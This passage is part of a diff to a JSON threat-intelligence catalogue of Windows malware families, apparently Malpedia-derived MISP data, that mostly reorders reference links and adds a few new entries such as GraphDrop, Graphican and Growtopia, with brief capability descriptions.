C&C server. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", - "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", "https://www.youtube.com/watch?v=rfzmHjZX70s", "https://asec.ahnlab.com/en/31089/", - "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf" + "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html" ], "synonyms": [ "Lovexxx" @@ -26396,6 +27602,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", + "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign", "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" ], "synonyms": [], @@ -26422,8 +27629,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer", - "https://twitter.com/vxunderground/status/1469713783308357633", - "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April" + "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April", + "https://twitter.com/vxunderground/status/1469713783308357633" ], "synonyms": [], "type": [] @@ -26437,8 +27644,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", "https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/", - "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" ], "synonyms": [ "Fuerboos" @@ -26479,43 +27686,43 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md", - "https://securelist.com/gootkit-the-cautious-trojan/102731/", - "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", - "https://www.certego.net/en/news/malware-tales-gootkit/", - "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", - "https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf", - "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", - "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/", - "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/", - "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope", - "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", - "https://twitter.com/MsftSecIntel/status/1366542130731094021", - "https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html", - "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", "https://www.youtube.com/watch?v=QgUlPvEE4aw", - "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", "https://www.youtube.com/watch?v=242Tn0IL2jE", + "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", + "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", + "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", + "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection", "https://dannyquist.github.io/gootkit-reversing-ghidra/", - "https://news.drweb.com/show/?i=4338&lng=en", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", - "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", - "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", - "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", - "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", - "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", - "https://twitter.com/jhencinski/status/1464268732096815105", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/", + "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", + "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", + "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md", + "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/", + "https://news.drweb.com/show/?i=4338&lng=en", + "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728", + "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://www.certego.net/en/news/malware-tales-gootkit/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "https://securelist.com/gootkit-the-cautious-trojan/102731/", + "https://twitter.com/jhencinski/status/1464268732096815105", + "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728" + "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html", + "https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf", + "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://twitter.com/MsftSecIntel/status/1366542130731094021", + "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/" ], "synonyms": [ "Waldek", @@ -26532,8 +27739,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe", - "https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville", - "https://www.proofpoint.com/us/threat-insight/post/dyre-malware-campaigners-innovate-distribution-techniques" + "https://www.proofpoint.com/us/threat-insight/post/dyre-malware-campaigners-innovate-distribution-techniques", + "https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville" ], "synonyms": [], "type": [] @@ -26586,25 +27793,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", + "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef", + "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://www.youtube.com/watch?v=BcFbkjUVc7o", + "https://lokalhost.pl/gozi_tree.txt", + "https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072", + "https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://github.com/mlodic/ursnif_beacon_decryptor", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/", - "https://www.secureworks.com/research/gozi", - "https://lokalhost.pl/gozi_tree.txt", - "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance", - "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.youtube.com/watch?v=BcFbkjUVc7o", - "https://github.com/mlodic/ursnif_beacon_decryptor", - "https://www.secureworks.com/research/threat-profiles/gold-swathmore", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", - "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", - "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.secureworks.com/research/gozi", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance" ], "synonyms": [ "CRM", @@ -26623,9 +27832,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", - "https://de.securelist.com/analysis/59479/erpresser/", - "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", + "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", + "https://de.securelist.com/analysis/59479/erpresser/", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" ], "synonyms": [], @@ -26652,9 +27861,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", - "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" + "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html", + "https://bin.re/blog/the-dga-of-symmi/" + ], + "synonyms": [ + "MewsSpy" ], - "synonyms": [], "type": [] }, "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", @@ -26665,10 +27877,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gramdoor", - "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611", "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf" + "https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611" ], "synonyms": [ "Small Sieve" @@ -26683,15 +27895,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro", - "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season", - "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks", "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/", + "https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals", "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.metabaseq.com/grandoreiro-banking-malware-deciphering-the-dga/", + "https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_study_grandoreiro_analysis_2022_v1.pdf", + "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/", "https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf", - "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/" + "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [], "type": [] @@ -26712,26 +27926,62 @@ "uuid": "626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14", "value": "GrandSteal" }, + { + "description": "PANW Unit 42 describes this malware as capable of up and downloading files as well as loading additional shellcode payloads into selected target processes. It uses the Microsoft Graph API and Dropbox API as C&C channel.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop", + "https://www.avertium.com/resources/threat-reports/evolution-of-russian-apt29-new-attacks-and-techniques-uncovered", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf", + "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/" + ], + "synonyms": [ + "GraphicalProton" + ], + "type": [] + }, + "uuid": "15d96a22-118b-4933-8258-e9cc4dd9719a", + "value": "GraphDrop" + }, { "description": "This loader abuses the benign service Notion for data exchange.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino", - "https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf", "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58", - "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine" + "https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d", + "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf", + "https://mssplab.github.io/threat-hunting/2023/06/02/malware-analysis-apt29.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf" + ], + "synonyms": [ + "SNOWYAMBER" ], - "synonyms": [], "type": [] }, "uuid": "cb92a200-b4f0-4983-8d5d-6bf529b66da9", "value": "GraphicalNeutrino" }, + { + "description": "According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican\u2019s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphican", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/flea-backdoor-microsoft-graph-apt15" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ccaefb44-1cbb-4f91-bd2d-ea5735446d1d", + "value": "Graphican" + }, { "description": "Downloader / information stealer used by UAC-0056, observed since at least October 2022.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphiron", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nodaria-ukraine-infostealer" ], "synonyms": [], @@ -26773,16 +28023,18 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel", "https://www.mandiant.com/resources/spear-phish-ukrainian-entities", + "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/", "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://cert.gov.ua/article/38374", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", + "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", + "https://cert.gov.ua/article/38374", + "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine", - "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/" + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel" ], "synonyms": [], "type": [] @@ -26791,20 +28043,20 @@ "value": "GraphSteel" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-franklin", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/", - "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", - "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", + "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html" + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-franklin" ], "synonyms": [ "FrameworkPOS", @@ -26833,10 +28085,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", - "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", - "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html", "https://securelist.com/gravityrat-the-spy-returns/99097/", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/" + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", + "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" ], "synonyms": [], "type": [] @@ -26849,9 +28101,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grease", - "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", - "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf" ], "synonyms": [], "type": [] @@ -26874,20 +28126,33 @@ "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", "value": "GreenShaitan" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul", + "https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b8763a6f-2711-454d-bbde-7408ebe932c1", + "value": "GreetingGhoul" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-viking", - "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", - "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", - "https://github.com/NozomiNetworks/greyenergy-unpacker", - "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", - "https://www.eset.com/int/greyenergy-exposed/", "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", - "https://attack.mitre.org/groups/G0034" + "https://www.eset.com/int/greyenergy-exposed/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + "https://attack.mitre.org/groups/G0034", + "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "https://github.com/NozomiNetworks/greyenergy-unpacker", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://www.secureworks.com/research/threat-profiles/iron-viking" ], "synonyms": [], "type": [] @@ -26900,8 +28165,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark", - "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/", - "https://content.fireeye.com/m-trends/rpt-m-trends-2019" + "https://content.fireeye.com/m-trends/rpt-m-trends-2019", + "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/" ], "synonyms": [ "Hellsing Backdoor" @@ -26916,9 +28181,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent", - "https://twitter.com/bryceabdo/status/1352359414746009608", "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer", "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", + "https://twitter.com/bryceabdo/status/1352359414746009608", "https://blog.group-ib.com/grimagent" ], "synonyms": [], @@ -26933,17 +28198,17 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimplant", "https://www.mandiant.com/resources/spear-phish-ukrainian-entities", + "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/", "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://cert.gov.ua/article/38374", - "https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.govinfosecurity.com/cyber-espionage-actor-deploying-malware-using-excel-a-18830", + "https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/", + "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", + "https://cert.gov.ua/article/38374", + "https://www.intezer.com/blog/research/elephant-malware-targeting-ukrainian-orgs/", "https://businessinsights.bitdefender.com/deep-dive-into-the-elephant-framework-a-new-cyber-threat-in-ukraine", - "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/" + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya" ], "synonyms": [], "type": [] @@ -26964,16 +28229,29 @@ "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", "value": "GROK" }, + { + "description": "According to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims that it has created this software for educational purposes only. This stealer uses the name of a legitimate online game.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.growtopia", + "https://github.com/TheC0mpany/GrowtopiaStealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5fb7db86-a510-400c-b7d3-4197eef09755", + "value": "Growtopia" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt", - "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", - "https://twitter.com/ItsReallyNick/status/1208141697282117633", - "https://www.telsy.com/download/5776/?uid=aca91e397e", "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - 